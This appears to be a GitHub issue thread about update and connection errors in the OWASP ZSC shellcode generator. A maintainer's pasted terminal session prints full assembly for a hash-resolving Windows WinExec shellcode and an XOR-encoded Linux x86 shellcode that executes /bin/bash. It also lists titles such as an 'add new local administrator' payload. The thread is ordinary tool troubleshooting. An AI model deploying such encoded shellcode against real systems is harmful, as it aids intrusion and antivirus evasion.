ZSC made nothing

[iNoSec]

hi, whatever i chose i have an error, i cant see shellstorm shellcode because connection error or anything else. i saw there is ton ofbugs after an update, does it affect all the framework?

[iNoSec]

My bad thats simple the copy/paste thas make bug, if type the command not like a big fat ass thats work, can close this issue

[iNoSec]

just update dont work

[Ali-Razmjoo]

works fine for me!

  ______          __      _____ _____    ______ _____  _____
 / __ \ \        / /\    / ____|  __ \  |___  // ____|/ ____|
| |  | \ \  /\  / /  \  | (___ | |__) |    / /| (___ | |
| |  | |\ \/  \/ / /\ \  \___ \|  ___/    / /  \___ \| |
| |__| | \  /\  / ____ \ ____) | |       / /__ ____) | |____
 \____/   \/  \/_/    \_\_____/|_|      /_____|_____/ \_____|


                OWASP ZeroDay Cyber Research Shellcoder

zsc> shellcode
zsc/shellcode>
download         generate         search           shell_storm_list
zsc/shellcode> search
keyword_to_search>
download         generate         search           shell_storm_list
keyword_to_search> winexec
[+] author: DATA_SNIPER shellcode_id: 148       platform: Windows       title: telnetbind by winexec - 111 bytes
[+] author: Lord Kelvin shellcode_id: 581       platform: Windows       title: XP sp3 (Ru) WinExec+ExitProcess cmd shellcode - 12 bytes
[+] author: RubberDuck  shellcode_id: 766       platform: Windows       title: Allwin WinExec add new local administrator + ExitProcess Shellcode - 272 bytes
[+] author: RubberDuck  shellcode_id: 662       platform: Windows       title: Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes
[+] author: Weiss       shellcode_id: 391       platform: Windows       title: WinExec() Command Parameter - 104 bytes

zsc> shellcode
zsc/shellcode> download
shellcode_id> 391

;
; relocateable dynamic runtime assembly code example using hash lookup
;
; WinExec() with ExitThread()
; 104 bytes
;
; for testing:
;
; ml /c /coff /Cp wexec2.asm
; link /subsystem:windows /section:.text,w wexec2.obj
;
; wyse101 [at] gmail.com
;
; October 2006
;
.386
.model flat,stdcall

ROL_CONSTANT equ 5

mrol macro iNum:req,iBits:req
   exitm <(iNum shl iBits) or (iNum shr (32-iBits))>
endm

mror macro iNum:req,iBits:req
   exitm <(iNum shr iBits) or (iNum shl (32-iBits))>
endm

hashapi macro szApi
   local dwApi

   dwApi = 0

   forc x,szApi
      dwApi = dwApi + '&x'
      dwApi = mrol(dwApi,ROL_CONSTANT)
   endm
   dwApi = mrol(dwApi,ROL_CONSTANT)
   dw (dwApi and 0ffffh)
endm

.code

   assume fs:nothing

code_start:
   jmp load_data
setup_parameters:
   pop ebp
   xor ecx,ecx
   push ecx                                 ; ExitThread() exitcode
   push ecx                                 ; SW_HIDE
   mov cl,(cmd_end-api_hashes)              ; limit of 255 bytes per command
   inc byte ptr[ebp+ecx]
   lea eax,[ebp+(cmd_string-api_hashes)]
   push eax                                 ; WinExec command string
get_k32_base:
   mov cl,30h
   mov eax,fs:[ecx]
   mov eax,[eax+0ch]
   mov esi,[eax+1ch]
   lodsd
   mov ebx,[eax+08h]
get_api_loop:
   mov eax,[ebx+3ch]
   mov eax,[ebx+eax+78h]
   lea esi,[ebx+eax+1ch]
   mov cl,3
load_rva:
   lodsd
   add eax,ebx
   push eax
   loop load_rva
   pop ebp
   pop edi
load_api:
   mov esi,[edi+4*ecx]
   add esi,ebx
   xor eax,eax
   cdq
hash_api:
   lodsb
   add edx,eax
   rol edx,ROL_CONSTANT
   dec eax
   jns hash_api
   inc ecx
   mov eax,[esp+4]
   cmp dx,word ptr[eax]
   jne load_api
   pop eax
   movzx edx,word ptr[ebp+2*ecx-2]
   add ebx,[eax+4*edx]
   pop esi
   call ebx
   lodsw
   jmp get_k32_base
load_data:
   call setup_parameters
api_hashes:
   hashapi <WinExec>
   hashapi <ExitThread>
code_end:

cmd_string db 'cmd /c echo hello,world>test.txt && notepad test.txt',0ffh
cmd_end equ $-1

end code_start





Shellcode output to a .c file?(y or n)> n
zsc> shellcode
zsc/shellcode> generate
zsc/shellcode/generate> linux_x86
zsc/shellcode/generate/linux_x86>
chmod            download         exec             script_executor  write
dir_create       download_execute file_create      system
zsc/shellcode/generate/linux_x86> exec
zsc/shellcode/generate/linux_x86/exec> file_to_execute
file_to_execute> /bin/bash

[+] file_to_execute set to "/bin/bash"

[+] none
[+] xor_random
[+] xor_yourvalue
[+] add_random
[+] add_yourvalue
[+] sub_random
[+] sub_yourvalue
[+] inc
[+] inc_timesyouwant
[+] dec
[+] dec_timesyouwant
[+] mix_all


[+] enter encode type
zsc/shellcode/generate/linux_x86/exec/encode_type> xo
xor_random    xor_yourvalue
zsc/shellcode/generate/linux_x86/exec/encode_type> xor_random

Output assembly code?(y or n)> n
Output shellcode to screen?(y or n)> y
[+] Generated shellcode is:
\x6a\x4e\x58\x83\xf0\x08\x31\xdb\x31\xc9\xcd\x80\x68\x6a\x45\x48\x62\x5b\x68\xfa\xd5\xd8\x0a\x58\x31\xd8\x50\x5b\xc1\xeb\x10\xc1\xeb\x08\x53\x68\x37\x31\x4e\x57\x5b\x68\x18\x53\x2f\x24\x58\x31\xd8\x50\x68\x5a\x38\x65\x4c\x5b\x68\x75\x5a\x0c\x22\x58\x31\xd8\x50\x89\xe3\x31\xc0\xb0\x0b\xcd\x80\xb0\x01\xb3\x01\xcd\x80

Shellcode output to a .c file?(y or n)> n
zsc> wrong input!
[!] interrupted by user!
Exit

C:\Users\Zombie\Documents\GitHub\OWASP-ZSC>python -V
Python 2.7.13

C:\Users\Zombie\Documents\GitHub\OWASP-ZSC>

[Ali-Razmjoo]

if you still have errors, please provide your os, os version, python version.

[iNoSec]

Like i said, i copied/paste command but when i write them, all is working just the update command which fail with a connection errror. I can dl shellcode from shellstorm so i have no problem with my connection. Im not on my pc now but i will see the update URL in the code tonight.
Im on ParrotOS and i use python 2.7 for owasp zsc (i confirm tonight)
Thanks